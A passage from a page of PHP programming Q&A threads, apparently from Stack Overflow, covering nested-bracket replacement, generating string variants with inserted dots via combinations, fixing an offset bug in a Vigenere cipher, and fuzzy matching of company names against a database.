$brackets = [['(', ')'], ['{', '}'], ['[', ']']]; // new parentheses for every level
$level = 0;
$count = 1; // count or replace made
while($count) {
$str = preg_replace_callback('(\(([^()]+)\))',
function ($m) use (&$to, &$from, $brackets, $level) {
array_unshift($to, $brackets[$level][0] . $m[1] . $brackets[$level][1]);
$i = '#' . (count($to)-1); // pattern for future replace.
// here it '#1', '#2'.
// Make it so they will be unique
array_unshift($from, $i);
return $i; }, $str, -1, $count);
$level++;
}
echo str_replace($from, $to, $str); // return content back
// sqrt[{2 * (2+2)} + sin{pi/(6+7)}]
I forgot all details, but it, seems, works

Rewrite a large number of for loops into something shorter

I have the following code:
for($a=1; $a<strlen($string); $a++){
for($b=1; $a+$b<strlen($string); $b++){
for($c=1; $a+$b+$c<strlen($string); $c++){
for($d=1; $a+$b+$c+$d<strlen($string); $d++){
$tempString = substr_replace($string, ".", $a, 0);
$tempString = substr_replace($tempString, ".", $a+$b+1, 0);
$tempString = substr_replace($tempString, ".", $a+$b+$c+2, 0);
$tempString = substr_replace($tempString, ".", $a+$b+$c+$d+3, 0);
echo $tempString."</br>";
}
}
}
}
What it does is to make all possible combinations of a string with several dots.
Example:
t.est123
te.st123
tes.t123
...
test12.3
Then, I add one more dot:
t.e.st123
t.es.t123
...
test1.2.3
Doing it the way I'm doing now, I need to create lots and lots of for loops, one set for each number of dots. I don't know how I can turn that example into a function or some other easier way of doing this.
Your problem is a combination problem. Note: I'm not a math freak, I only researched this information because of interest.
http://en.wikipedia.org/wiki/Combination#Number_of_k-combinations
Also known as n choose k. The Binomial coefficient is a function which gives you the number of combinations.
A function I found here: Calculate value of n choose k
/**
 * Binomial coefficient "n choose k": the number of ways to pick $k items out of $n.
 *
 * Computed iteratively; after step i the running value is C(n - k + i, i),
 * so every division is exact and the result stays an integer.
 *
 * @param int $n Size of the set.
 * @param int $k Number of items picked.
 * @return int 0 when $k is negative or, for non-negative $n, larger than $n.
 */
function choose(int $n, int $k): int
{
    // A negative $k used to recurse without ever reaching the base case.
    if ($k < 0) {
        return 0;
    }
    // C(n, k) == C(n, n - k): use the smaller side to shorten the loop.
    if ($n >= $k && $n - $k < $k) {
        $k = $n - $k;
    }
    $result = 1;
    for ($i = 1; $i <= $k; $i++) {
        $result = intdiv($result * ($n - $k + $i), $i);
    }
    return $result;
}
// 6 positions between characters (test123), 4 dots
echo choose(6, 4); // 15 combinations
To get all combinations you also have to choose between different algorithms.
Good post: https://stackoverflow.com/a/127856/1948627
UPDATE:
I found a site with an algorithm in different programming languages. (But not PHP)
I've converted it to PHP:
/**
 * Lists the zero-based positions of the set bits of $u, lowest bit first.
 *
 * @param int $u Bit mask.
 * @return array Positions of the 1-bits in ascending order.
 */
function bitprint($u){
    $positions = [];
    $bit = 0;
    while ($u > 0) {
        if (($u & 1) > 0) {
            $positions[] = $bit;
        }
        $u >>= 1;
        ++$bit;
    }
    return $positions;
}
/**
 * Counts the set bits of $u by clearing the lowest set bit until none remain.
 *
 * @param int $u Bit mask.
 * @return int Number of 1-bits.
 */
function bitcount($u){
    $count = 0;
    while ($u > 0) {
        // $u & ($u - 1) drops the lowest set bit.
        $u &= ($u - 1);
        ++$count;
    }
    return $count;
}
/**
 * Enumerates every way to choose $c positions out of $n by walking all
 * $n-bit masks and keeping those with exactly $c bits set.
 *
 * @param int $c Number of positions to choose.
 * @param int $n Number of available positions.
 * @return array List of combinations, each a list of positions as returned by bitprint().
 */
function comb($c, $n){
    $limit = 1 << $n;
    $subsets = [];
    $mask = 0;
    while ($mask < $limit) {
        if (bitcount($mask) == $c) {
            $subsets[] = bitprint($mask);
        }
        $mask++;
    }
    return $subsets;
}
echo '<pre>';
print_r(comb(4, 6));
It outputs an array with all combinations (positions between the chars).
The next step is to replace the string with the dots:
$string = 'test123';
$sign = '.';
$combs = comb(4, 6);
// get all combinations (Th3lmuu90)
/*
$combs = [];
for($i=0; $i<strlen($string); $i++){
$combs = array_merge($combs, comb($i, strlen($string)-1));
}
*/
foreach ($combs as $comb) {
$a = $string;
for ($i = count($comb) - 1; $i >= 0; $i--) {
$a = substr_replace($a, $sign, $comb[$i] + 1, 0);
}
echo $a.'<br>';
}
// output:
t.e.s.t.123
t.e.s.t1.23
t.e.st.1.23
t.es.t.1.23
te.s.t.1.23
t.e.s.t12.3
t.e.st.12.3
t.es.t.12.3
te.s.t.12.3
t.e.st1.2.3
t.es.t1.2.3
te.s.t1.2.3
t.est.1.2.3
te.st.1.2.3
tes.t.1.2.3
This is quite an unusual question, but I can't help but try to wrap my head around what you are trying to do. My guess is that you want to see how many combinations of a string there are with a dot moving between characters, finally coming to rest right before the last character.
My understanding is you want a count and a printout of string similar to what you see here:
t.est
te.st
tes.t
t.es.t
te.s.t
t.e.s.t
count: 6
To facilitate this functionality I came up with a class, this way you could port it to other parts of code and it can handle multiple strings. The caveat here is the strings must be at least two characters and not contain a period. Here is the code for the class:
/**
 * Prints variants of a string with dots inserted between its characters and
 * keeps a count of how many were printed.
 */
class DotCombos
{
    /** Number of variants printed by the last allCombos() call. */
    public $combos;

    /**
     * Prints one variant per position, moving a new dot rightwards until the
     * end of the string or an existing dot is reached.
     *
     * @param string $string Text to insert the dot into.
     * @return string The last variant printed, or "" when none was printed.
     */
    private function combos($string)
    {
        $latest = "";
        $length = strlen($string);
        // Position 0 is skipped: a dot is never placed before the first character.
        for ($pos = 1; $pos < $length; $pos++) {
            if (substr($string, $pos, 1) == ".") {
                break;
            }
            $latest = substr($string, 0, $pos) . "." . substr($string, $pos);
            print("$latest\n");
            $this->combos++;
        }
        return $latest;
    }

    /**
     * Prints the variants round by round; each round starts from the last
     * variant of the previous one.
     *
     * @param string $string Text of at least two characters.
     * @return null
     */
    public function allCombos($string)
    {
        if (strlen($string) < 2) {
            return null;
        }
        $this->combos = 0;
        $round = 0;
        // The bound is re-evaluated every round because $string changes.
        while ($round < strlen($string) - 1) {
            $string = $this->combos($string);
            $round++;
        }
    }
}
To make use of the class you would do this:
$combos = new DotCombos();
$combos->allCombos("test123");
print("Count: $combos->combos");
The output would be:
t.est123
te.st123
tes.t123
test.123
test1.23
test12.3
t.est12.3
te.st12.3
tes.t12.3
test.12.3
test1.2.3
t.est1.2.3
te.st1.2.3
tes.t1.2.3
test.1.2.3
t.est.1.2.3
te.st.1.2.3
tes.t.1.2.3
t.es.t.1.2.3
te.s.t.1.2.3
t.e.s.t.1.2.3
Count: 21
Hope that is what you are looking for (or at least helps)....

Vigenere in PHP

could anyone help me fix this Vigenere cypher in PHP?
Sorry for the ripped up code, that's from where I have been dissecting it for hours - trying to fix!
Anyhow, the code outputs 'Ace' when it should output 'Abc'.
There is some weird double offset which I don't have the maths brain to fix! Thanks for reading.
The code originates from here in AutoHotkey script - I have attempted to transcribe it. There are PHP Vigenere examples on the web (although not on Rosetta Code, weirdly!).. but anyhow, this one is modified to accept lower case as well as the standard capitals. Thanks.
$key = "AAA";
$keyLength = 3;
$keyIndex = 0;
$messageAsArray[0] = "A";
$messageAsArray[1] = "b";
$messageAsArray[2] = "c";
foreach ($messageAsArray as $value) //Loop through input string array
{
$thisValueASCII = ord($value);
if ($thisValueASCII >= 65 && $thisValueASCII <= 90) //if is uppercase
{
$thisValueASCIIOffset = 65;
}
else //if is lowercase
{
$thisValueASCIIOffset = 97;
}
$thisA = $thisValueASCII - $thisValueASCIIOffset;
$thisB = fmod($keyIndex,$keyLength);
$thisC = substr($key, $thisB, 1);
$thisD = ord($thisC) - 65;
$thisE = $thisA + $thisD;
$thisF = fmod($thisE,26);
$thisG = $thisF + $thisValueASCII ;
$thisOutput = chr($thisG);
$output = $output . $thisOutput ;
$keyIndex++;
}
echo $output
Ok, I read your code.
You're encoding, and your error is quite simple :
$thisG = $thisF + $thisValueASCII ;
In this step, $thisF is your encrypted letter, which value is between 0 and 25. You want to print it as an ascii char and, instead of adding the offset, you're adding the uncrypted ascii value, which makes no sense.
You should have :
$thisG = $thisF + $thisValueASCIIOffset;
A few tips.
You don't need to have your text or key as an array, you can use it as if it was one.
You can use the % operator instead of fmod. It makes the code easier to read, but that is just a personal preference.
For instance :
$key = "AAA";
$keyLength = strlen($key);
$keyIndex = 0;
$message = str_split("Abc");
$output = '';
foreach($message as $value) // Loop through input string array
{
$thisValueASCII = ord($value);
if($thisValueASCII >= 65 && $thisValueASCII <= 90) // if is uppercase
{
$thisValueASCIIOffset = 65;
} else // if is lowercase
{
$thisValueASCIIOffset = 97;
}
$letter_value_corrected = $thisValueASCII - $thisValueASCIIOffset;
$key_index_corrected = $keyIndex % $keyLength; // This is the same as fmod but I prefer this notation.
$key_ascii_value = ord($key[$key_index_corrected]);
if($key_ascii_value >= 65 && $key_ascii_value <= 90) // if is uppercase
{
$key_offset = 65;
} else // if is lowercase
{
$key_offset = 97;
}
$final_key = $key_ascii_value - $key_offset;
$letter_value_encrypted = ($letter_value_corrected + $final_key)%26;
$output = $output . chr($letter_value_encrypted + $thisValueASCIIOffset);
$keyIndex++;
}
echo $output;
Have fun and good luck for your implementation !

How to reliably find similar strings to that typed in

I have an interface where a user will enter the name of a company. It then compares what they typed to current entries in the database, and if something similar is found it presents them with options (in case they misspelled) or they can click a button which confirms what they typed is definitely new and unique.
The problem I am having is that it is not very accurate and often brings up dozens of "similar" matches that aren't that similar at all!
Here is what I have now. I didn't write the first large function and I am not clear on what exactly it does. Is there a much simpler way to achieve what I want?
// Compares strings and determines how similar they are based on a nth letter split comparison.
/**
 * usort() comparator that orders entries by their "score" key, highest first.
 * The parameters are deliberately named in reverse ($b before $a) to get the
 * descending order.
 *
 * @param array $b First entry handed over by usort().
 * @param array $a Second entry handed over by usort().
 * @return int 1, 0 or -1
 */
function cmp_by_optionNumber($b, $a) {
    $left = $a["score"];
    $right = $b["score"];
    if ($left == $right) {
        return 0;
    }
    return $left > $right ? 1 : -1;
}
/**
 * Scores how similar $str_a is to $str_b.
 *
 * $str_a is cut into runs of consecutive characters that also occur as a
 * substring of $str_b. Each run is scored by its length relative to $str_a
 * and by how close its position in $str_a is to its first occurrence in
 * $str_b; the result is the sum of the run scores.
 *
 * @param string $str_a String being examined.
 * @param string $str_b String it is compared against.
 * @return int|float Sum of the run scores; 0 when nothing matches.
 */
function string_compare($str_a, $str_b)
{
    $lenA = strlen($str_a);
    $lenB = strlen($str_b);
    $scores = array();   // run number => latest score of that run
    $slot = 0;
    $run = '';

    for ($pos = 0; $pos < $lenA; $pos++) {
        $char = substr($str_a, $pos, 1);

        if (strpos($str_b, $char) === FALSE) {
            // Character absent from $str_b: the current run ends here.
            $run = '';
            $slot++;
            continue;
        }

        $run = $run . $char;
        $foundAt = strpos($str_b, $run);

        if ($foundAt === FALSE) {
            // The extended run no longer matches: close it and revisit this
            // character as the start of a new run.
            $run = '';
            $slot++;
            $pos--;
            continue;
        }

        $startInA = $pos - strlen($run) + 1;
        $positiondiff = abs($startInA - $foundAt);
        $posfactor = ($lenA - $positiondiff) / $lenB;
        $lengthfactor = strlen($run) / $lenA;
        // A run that keeps growing overwrites its own earlier score.
        $scores[$slot] = $posfactor * $lengthfactor;
    }

    return array_sum($scores);
}
// Looks up existing companies whose name resembles the submitted one. An exact
// match prints the company id and stops; otherwise the closest candidates are
// rendered as a clickable list.
$q = isset($_POST['stringA']) ? (string) $_POST['stringA'] : '';
$qLengthMin = strlen($q) - 5; // Part of search calibration. Smaller number = stricter.
$qLengthMax = strlen($q) + 2; // not in use.
$main = [];
include("pdoconnect.php");

if ($q !== '') {
    // The first letter MUST be correct. This assumption makes the checker
    // faster and reduces irrelevant results. LIKE wildcards in the user's
    // first character are escaped so they match literally.
    $firstLetter = addcslashes(substr($q, 0, 1), '%_\\');

    // User input is bound as parameters, never interpolated into the SQL text.
    $stmt = $dbh->prepare(
        "SELECT id, name FROM entity_details
        WHERE name LIKE ?
        AND CHAR_LENGTH(name) >= ?"
    );
    $stmt->execute([$firstLetter . '%', $qLengthMin]);

    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        $name = rawurldecode($row['name']);
        $percent = string_compare(strtolower($q), strtolower($name));
        if ($percent == 1) {
            // An exact match on a company already in our DB: report its id.
            echo $row['id'];
            exit();
        } elseif ($percent >= 0.6) { // Part of search calibration. Higher deci number = stricter.
            $main[] = [
                'name' => $name,
                'score' => round($percent, 2) * 100,
            ];
        }
    }
}

usort($main, "cmp_by_optionNumber");
$z = 0;
echo '<div style="overflow-y:scroll;height:175px;width:460px;">';
foreach ($main as $c) {
    if ($c['score'] > 100) {
        $c['score'] = 100;
    }
    if (count($main) > 1) {
        echo '<div id="anysuggested' . $z . '" class="hoverdiv" onclick="selectAuto(' . "'score$z'" . ');">';
    } else {
        // A single suggestion is highlighted.
        echo '<div id="anysuggested' . $z . '" class="hoverdiv" style="color:#009444;" onclick="selectAuto(' . "'score$z'" . ');">';
    }
    // Names come from the database and must be escaped before reaching the HTML.
    echo '<span id="autoscore' . $z . '">' . htmlspecialchars($c['name'], ENT_QUOTES, 'UTF-8') . '</span></div>';
    $z++;
}
echo '</div>';
Comparing strings is a huge topic and there are many ways to do it. One very common algorithm is called the Levenshtein distance. PHP has a native implementation, but MySQL does not. There is however an implementation here that you could use.
You need approximate/fuzzy string matching.
Read more about
http://php.net/manual/en/function.levenshtein.php, http://www.slideshare.net/kyleburton/fuzzy-string-matching
The best way would be to use some index based search engine like SOLR http://lucene.apache.org/solr/.

Categories